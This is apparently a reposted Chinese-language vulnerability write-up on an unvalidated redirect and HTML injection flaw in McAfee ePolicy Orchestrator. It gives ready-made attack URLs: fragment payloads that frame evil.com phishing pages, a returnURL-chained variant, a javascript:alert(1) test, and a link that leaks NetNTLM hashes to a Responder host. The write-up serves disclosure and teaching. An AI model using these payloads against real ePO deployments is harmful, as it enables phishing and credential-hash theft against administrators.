McAfee ePolicy Orchestrator中HTML注入漏洞的示例分析

這篇文章將為大家詳細講解有關McAfee ePolicy Orchestrator中HTML注入漏洞的示例分析，小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

漏洞概述

低于5.10 Update 10版本的McAfee ePolicy Orchestrator (ePO)產品中被曝存在未經驗證的客戶端URL重定向漏洞，該漏洞可能會導致經過身份驗證的ePO用戶在ePO IFRAME中加載不受信任的站點，從而允許攻擊者竊取經過身份驗證的用戶的敏感信息。這將要求攻擊者想辦法誘使ePO用戶單擊惡意鏈接，同時利用目標用戶單擊惡意鏈接時的瀏覽器登錄ePO服務器。

漏洞分析

在企業內部安全評估活動中，我的任務一般都是測試關鍵的公司基礎設施和軟件。在這一次，我們團隊的任務則是測試我們公司所使用的McAfee ePolicy Orchestrator產品以及相關的部署情況。

在評估過程中，我注意到該產品使用了大量的postMessage和Websockets，但其中有一點引起了我們的主意，即地址欄中的URL構造。

下面給出的是我們在訪問McAfee ePolicy Orchestrator儀表盤時，瀏覽器地址欄中常規的IP/URL結構：

https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do

/core/orionDefaultPage.do部分實際上是一個HTTP節點，跟其他HTTP節點一樣，它會在“頂部儀表盤控制欄”下的一個IFRAME中呈現給用戶，但它同時也會呈現在其他的IFRAME種。

注意到這一點之后，我嘗試的第一件事就是注入一個簡單的跨站腳本Payload然后查看結果：

https://epo-host:8443/core/orionNavigationLogin.do#//javascript:alert(1))

但是，Web應用程序會正確過濾掉我們的Payload，以及我所嘗試注入的其他Payload。

于是我打算檢查一下用于執行數據過濾的JavaScript代碼，然后我發現了下面這個東西：

https://epo-host:8443/core/orionNavigationLogin.do#//google.com

儀表盤現在將會在“頂部儀表盤控制欄”下的一個IFRAME中顯示Google搜索頁面。通過使用這種簡單的雙斜杠Payload，攻擊者將能夠向儀表盤中注入任何網站。考慮到儀表盤給用戶呈現數據時所采用的方式，攻擊者不僅可以執行成功率極高的網絡釣魚攻擊，而且還可以執行NetNTLM哈希泄露攻擊。

網絡釣魚攻擊場景

下面給出的是McAfee ePolicy Orchestrator的常規IP/URL結構：

https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do

攻擊者只需要將(#)之后的內容替換為惡意URL/域名，并將URL發送給擁有儀表盤訪問權限的用戶即可：

https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.php

這里需要注意的是，惡意域名托管的頁面不能將X-Frame-Options設置為“DENY”或“SAMEORIGIN”，以確保域名能夠正確地在儀表盤IFRAME中被加載。不過，惡意站點都是攻擊者控制的，這一點顯然不會成為問題。

對于更實際的網絡釣魚攻擊，可以利用儀表板授權節點及其GET參數returnURL構造可信度更高的URL：

https://epo-host:8443/SoftwareMgmt/enterLicenseKey.do?returnURL=%2f..%2fcore%2forionNavigationLogin.do%23%2f%2fevil.com%2fphish-page.php

上面的這個連接會將用戶導航到儀表盤中的“許可證密鑰”設置頁面中，在用戶執行任何操作（保存或取消）后，他將被重定向到釣魚網頁：

https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.php

ePO用戶NetNTLM哈希泄露場景

攻擊者還可以設計一個惡意鏈接，并將其指向運行了Responder或Inveigh的主機，并將其發送給具備儀表盤訪問權限的用戶，來執行NetNTLM哈希泄露攻擊：

https://epo-host:8443/core/orionNavigationLogin.do#//host-running-responder-or-inveigh

關于“McAfee ePolicy Orchestrator中HTML注入漏洞的示例分析”這篇文章就分享到這里了，希望以上內容可以對大家有一定的幫助，使各位可以學到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。